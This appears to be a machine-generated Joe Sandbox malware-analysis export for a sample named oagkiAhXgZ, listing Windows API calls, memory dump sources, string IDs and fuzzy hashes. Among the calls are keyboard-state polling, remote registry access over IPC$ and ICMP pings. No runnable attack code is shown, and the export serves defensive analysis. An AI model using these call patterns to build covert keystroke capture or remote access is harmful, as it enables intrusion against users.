                                                                                                      • Part of subcall function 00ABE551: timeGetTime.WINMM(?,?,00B0E6D4), ref: 00ABE555
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00B0E6E1
                                                                                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00B0E705
                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B0E727
                                                                                                    • SetActiveWindow.USER32 ref: 00B0E746
                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B0E754
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B0E773
                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00B0E77E
                                                                                                    • IsWindow.USER32 ref: 00B0E78A
                                                                                                    • EndDialog.USER32(00000000), ref: 00B0E79B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                    • String ID: BUTTON
                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                    • Opcode ID: 24b03a8f9b61b2a2876aa5b0f947e0779a1aaac1eb35363b9d15875d4bce698c
                                                                                                    • Instruction ID: 134fef3bd5e57064a0d82d657ebb500ffa495942e30be31bd69149f261ee88fe
                                                                                                    • Opcode Fuzzy Hash: 24b03a8f9b61b2a2876aa5b0f947e0779a1aaac1eb35363b9d15875d4bce698c
                                                                                                    • Instruction Fuzzy Hash: 63215471200205AFEB116F64EC8AA293FA9F755749F241865F52AA31F1DF71DC409B24
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B0EA5D
                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B0EA73
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0EA84
                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B0EA96
                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B0EAA7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SendString$_wcslen
                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                    • Opcode ID: 7122108443f9f6c199f71323e5dbea2d301efdf5dfb55cc6216644563e9bae7c
                                                                                                    • Instruction ID: 34f1d5f25e7704b4683ed99ae1c28e211296c9194f21ca2ebad29ca7d2c17a18
                                                                                                    • Opcode Fuzzy Hash: 7122108443f9f6c199f71323e5dbea2d301efdf5dfb55cc6216644563e9bae7c
                                                                                                    • Instruction Fuzzy Hash: A5115131A5021979D720A7A2DD4ADFF6BBCEBDAB40F0408A97811A70E1EFB04905C9B0
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00B05CE2
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B05CFB
                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B05D59
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00B05D69
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B05D7B
                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B05DCF
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B05DDD
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B05DEF
                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B05E31
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00B05E44
                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B05E5A
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00B05E67
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                    • String ID:
                                                                                                    • API String ID: 3096461208-0
                                                                                                    • Opcode ID: f56bda51698071005f64a4fa68896e40125b23875b01baa4f502be37e89438cd
                                                                                                    • Instruction ID: 92039f89740c11e052a3b3ce1699a35e1c87b415176f78b33361cae9e3203138
                                                                                                    • Opcode Fuzzy Hash: f56bda51698071005f64a4fa68896e40125b23875b01baa4f502be37e89438cd
                                                                                                    • Instruction Fuzzy Hash: 3151F0B1A00615AFDB18CFA8DD89AAE7BF5FB48300F248269F915E7690DB709D04CF50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB8BE8,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8FC5
                                                                                                    • DestroyWindow.USER32(?), ref: 00AB8C81
                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8D1B
                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00AF6973
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AF69A1
                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AF69B8
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000), ref: 00AF69D4
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00AF69E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 641708696-0
                                                                                                    • Opcode ID: 7fa776ae05e6f1e4e1ebf9f32d40ea767aeab8020c459e3e5de953c065c3f5eb
                                                                                                    • Instruction ID: 9e5184c6bca5d058a503c63ec44e305c1e782e2a9f043552aa26e96b7fb6f30e
                                                                                                    • Opcode Fuzzy Hash: 7fa776ae05e6f1e4e1ebf9f32d40ea767aeab8020c459e3e5de953c065c3f5eb
                                                                                                    • Instruction Fuzzy Hash: F361BB71102604DFCB259F6CCA48BB97BF9FB41312F244919E2469B561CB79AC82DFA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00AB9862
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorLongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 259745315-0
                                                                                                    • Opcode ID: 2156e6dab95dc5c70ba9e2fd449c6e6fa6efb6cdca77c593f57a307b2a55655c
                                                                                                    • Instruction ID: 0c017c3c925450e6086449b5906cfdd438faef52fff9802296cd533127536131
                                                                                                    • Opcode Fuzzy Hash: 2156e6dab95dc5c70ba9e2fd449c6e6fa6efb6cdca77c593f57a307b2a55655c
                                                                                                    • Instruction Fuzzy Hash: 05418131104644AFDB215FB89C85BFE3BB9AB06331F244659FAA6971E2DB319C42DB10
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00AEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00B09717
                                                                                                    • LoadStringW.USER32(00000000,?,00AEF7F8,00000001), ref: 00B09720
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00B09742
                                                                                                    • LoadStringW.USER32(00000000,?,00AEF7F8,00000001), ref: 00B09745
                                                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00B09866
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                    • API String ID: 747408836-2268648507
                                                                                                    • Opcode ID: 0b8b8c4a3dd6ace3c055d2b41c4ce2d42d7d66d9672c536f81ce5d1291799ea5
                                                                                                    • Instruction ID: 4139ed5cd460d3262e3aaf604147a6809ac7ab0b75eb8ad9298be75ca1cb2bf9
                                                                                                    • Opcode Fuzzy Hash: 0b8b8c4a3dd6ace3c055d2b41c4ce2d42d7d66d9672c536f81ce5d1291799ea5
                                                                                                    • Instruction Fuzzy Hash: C6410872800219AACF05EBE0CE86EEEB7B8AF56340F604065F505771D2EF256F48CB61
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B007A2
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B007BE
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B007DA
                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B00804
                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B0082C
                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B00837
                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B0083C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                    • API String ID: 323675364-22481851
                                                                                                    • Opcode ID: fc07668b800dea1318cfd2a8df17bd4426455825623cbaf869be8dcbc283386a
                                                                                                    • Instruction ID: 0d329d0fdb0e625a4cbc2ea10da6bbc89da128973738a71fad3dbbd6cbe19062
                                                                                                    • Opcode Fuzzy Hash: fc07668b800dea1318cfd2a8df17bd4426455825623cbaf869be8dcbc283386a
                                                                                                    • Instruction Fuzzy Hash: 9A41F872C10229ABDF15EFA4DD859EEBBB8FF14350F544169E901B71A1EB345E04CBA0
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B23C5C
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B23C8A
                                                                                                    • CoUninitialize.OLE32 ref: 00B23C94
                                                                                                    • _wcslen.LIBCMT ref: 00B23D2D
                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00B23DB1
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B23ED5
                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B23F0E
                                                                                                    • CoGetObject.OLE32(?,00000000,00B3FB98,?), ref: 00B23F2D
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00B23F40
                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B23FC4
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B23FD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 429561992-0
                                                                                                    • Opcode ID: 79115baba27a021271bb2c53e8ed6a4f73855f70e2fe01951ed07e8cbd0d59d3
                                                                                                    • Instruction ID: 4241825de17bf51b2cdedf9fb8b71c111bfbcba3ed644f305fbca5924e040448
                                                                                                    • Opcode Fuzzy Hash: 79115baba27a021271bb2c53e8ed6a4f73855f70e2fe01951ed07e8cbd0d59d3
                                                                                                    • Instruction Fuzzy Hash: 65C168716083159FC700DF68D98492BBBE9FF89B44F1049ADF98A9B250DB34EE05CB52
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B17AF3
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B17B8F
                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00B17BA3
                                                                                                    • CoCreateInstance.OLE32(00B3FD08,00000000,00000001,00B66E6C,?), ref: 00B17BEF
                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B17C74
                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00B17CCC
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00B17D57
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B17D7A
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00B17D81
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00B17DD6
                                                                                                    • CoUninitialize.OLE32 ref: 00B17DDC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2762341140-0
                                                                                                    • Opcode ID: 5b8402b1b16daa3b4715c874d5b2730e264783fa59b7538e3f7a3f1fb2a2e754
                                                                                                    • Instruction ID: d5b5dd0354e07b97d52a469ad5ee55c577082fadf399434b1f8e24749558dc1d
                                                                                                    • Opcode Fuzzy Hash: 5b8402b1b16daa3b4715c874d5b2730e264783fa59b7538e3f7a3f1fb2a2e754
                                                                                                    • Instruction Fuzzy Hash: 04C11C75A04109AFCB14DFA4D894DAEBBF9FF48314B1484A9E416DB361DB30EE81CB90
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B35504
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B35515
                                                                                                    • CharNextW.USER32(00000158), ref: 00B35544
                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B35585
                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B3559B
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B355AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CharNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1350042424-0
                                                                                                    • Opcode ID: c0552a893833cae39d0648b51b11b82e01beb745cdc21e4a3a531e98fbaf2923
                                                                                                    • Instruction ID: c008b608e4153cbca7ccbb1d10288c2943ed8478218f9de43650e3649e45b911
                                                                                                    • Opcode Fuzzy Hash: c0552a893833cae39d0648b51b11b82e01beb745cdc21e4a3a531e98fbaf2923
                                                                                                    • Instruction Fuzzy Hash: 33617D71904608EFDF20DF94CC85AFE7BF9EB09721F204185F925AB291DB749A81DB60
                                                                                                    APIs
                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AFFAAF
                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00AFFB08
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00AFFB1A
                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AFFB3A
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00AFFB8D
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AFFBA1
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00AFFBB6
                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00AFFBC3
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AFFBCC
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00AFFBDE
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AFFBE9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2706829360-0
                                                                                                    • Opcode ID: 9c0d882be65180f2c622fb02c002b73cdeac9e47b3b49ea3c978792474387cd6
                                                                                                    • Instruction ID: 0873df6aba09529039ea045da70713693a268488fb9f7f44e3b6363b81f4d0db
                                                                                                    • Opcode Fuzzy Hash: 9c0d882be65180f2c622fb02c002b73cdeac9e47b3b49ea3c978792474387cd6
                                                                                                    • Instruction Fuzzy Hash: 51412C35A00219AFDB10DFA8D8549BEBBB9FF48354F108069F956A7361DB30E945CBA0
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 00B09CA1
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00B09D22
                                                                                                    • GetKeyState.USER32(000000A0), ref: 00B09D3D
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00B09D57
                                                                                                    • GetKeyState.USER32(000000A1), ref: 00B09D6C
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00B09D84
                                                                                                    • GetKeyState.USER32(00000011), ref: 00B09D96
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00B09DAE
                                                                                                    • GetKeyState.USER32(00000012), ref: 00B09DC0
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00B09DD8
                                                                                                    • GetKeyState.USER32(0000005B), ref: 00B09DEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    • Opcode ID: 90ebff0adedc83a53cc04a0868bfb9a75c81d2afd52b98cd30a9744e1554b292
                                                                                                    • Instruction ID: 44e36c53e1c1886a29d36523499e141d7cb878cf10cd77ff116bb1aabeaeed56
                                                                                                    • Opcode Fuzzy Hash: 90ebff0adedc83a53cc04a0868bfb9a75c81d2afd52b98cd30a9744e1554b292
                                                                                                    • Instruction Fuzzy Hash: 0541A8349447C969FF359664C8043B5BEE0EF11344F0481EADAC6575C3DBA59DC8C792
                                                                                                    APIs
                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00B205BC
                                                                                                    • inet_addr.WSOCK32(?), ref: 00B2061C
                                                                                                    • gethostbyname.WSOCK32(?), ref: 00B20628
                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00B20636
                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B206C6
                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B206E5
                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00B207B9
                                                                                                    • WSACleanup.WSOCK32 ref: 00B207BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
